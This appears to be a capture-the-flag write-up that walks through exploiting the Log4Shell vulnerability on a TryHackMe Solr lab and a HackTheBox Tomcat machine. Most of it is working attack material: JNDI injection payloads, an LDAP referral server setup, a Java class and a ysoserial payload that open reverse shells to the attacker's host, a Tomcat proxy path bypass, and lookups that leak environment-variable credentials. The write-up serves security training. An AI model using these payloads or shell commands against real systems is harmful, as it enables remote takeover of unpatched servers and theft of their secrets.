Exploiting log4jshell(CVE-2021–44228)- solar(THM) and logforge(HTB)

Hi readers, here we will be looking into exploitation of CVE-2021–44228.

THM- solar

https://tryhackme.com/room/solar

Start the lab machine and let’s start with Reconnaissance-

TASK 2(Reconnaissance)

nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out 10.10.171.12
autorecon -vvv 10.10.171.12

Going through the results we found http is running on tcp port 8983. Service version is Apache Solr

Also we found ssh running on port 22. A simple google search of the ssh version header leads us to the Ubuntu version, which is Bionic Beaver

Task 2 answers:

TASK 3(Discovery)

Accessing the web server via browser. We get a ton of information regarding the tool/software running.

We have been provided with a zip file containing multiple log files. Answer the questions by analyzing the files.

TASK 4 and 5(POC, Exploitation)

If we try the log4jshell POC payload in the path(/admin/cores) which we have seen in the log file, we see that we are getting the connect back.

${jndi:ldap://ATTACKERCONTROLLEDHOST}

Note: We can try this POC anywhere in user controlled input which is being logged.

nc -lnvp 9999
curl 'http://10.10.114.97:8983/solr/admin/cores?foo=$\{jndi:ldap://10.17.7.105:9999\}'
curl 'http://10.10.114.97:8983/solr/admin/cores?foo=$\{jndi:rmi://10.17.7.105:9999/lollz\}'

Installing java 8 manually(it is a prerequisite for our ldap server() which will translate ldap requests to http):

update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_311/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_311/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_311/bin/javaws" 1
update-alternatives --set java /usr/lib/jvm/jdk1.8.0_311/bin/java
update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_311/bin/javac
update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_311/bin/javaws
java -version

apt install maven
mvn clean package -DskipTests 
# This will Compile the java app @ https://github.com/mbechler/marshalsec

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.17.7.105:8000/#Exploit"

Now our ldap server is running which will be forwarding the requests to http server, which will be hosting our payload!

Next step is to compile and host Exploit payload(we are using netcat reverse shell payload in this case)

public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.17.7.105 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

javac Exploit.java -source 8 -target 8

Now it’s time to pwn the server :)

curl 'http://10.10.156.44:8983/solr/admin/cores?foo=$\{jndi:ldap://10.17.7.105:1389/Exploit\}'

HTB- logforge

Apache reverse proxy bypass:

http://10.10.11.138/portal/..;/manager/html/expire?path=/
or
http://10.10.11.138/;name=lollz/manager/html/upload

Finding out tomcat using log4j…

Using JNDI-Exploit-Kit(https://github.com/pimps/JNDI-Exploit-Kit) and ysoserial-modified(https://github.com/pimps/ysoserial-modified)

a) Creating serialized object-

java -jar ysoserial-modified.jar CommonsCollections5 bash 'sh -i >& /dev/tcp/10.10.14.40/53 0>&1' > /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser

b) Using JNDI Injection Exploit Kit to setup the LDAP Server-

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.40:1389 -P /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser

c) Getting Reverse shell-

ldap://10.10.14.40:1389/a8ziqy
${jndi:ldap://10.10.14.40:1389/a8ziqy}

d) Finding java based ftp server running-

e) Testing ftp server for jndi injection-

f) Checking out java based ftp server source code:

Here we found password and username is being stored in environment variables and we can read these using jndi injection!

g) Reading environment variables. The way this works is our ldap server will be getting this in logs but we don’t hv any functionality for this, So we will use Wireshark to see the traffic:

${jndi:ldap://<IP>:<PORT>/${env:<var_name>}}
${jndi:ldap://10.10.14.40:1389/${env:ftp_user}}

ftp username is ippsec

Similarly we can get password:

log4j_env_leakage

Other useful info:

${jndi:ldap://10.10.14.40:1389/${java:version}}
${jndi:ldap://10.10.14.40:1389/${java:os}}

Thanks for reading!

References:

TryHackMe | Solar, exploiting log4j

https://twitter.com/marcioalm/status/1470361495405875200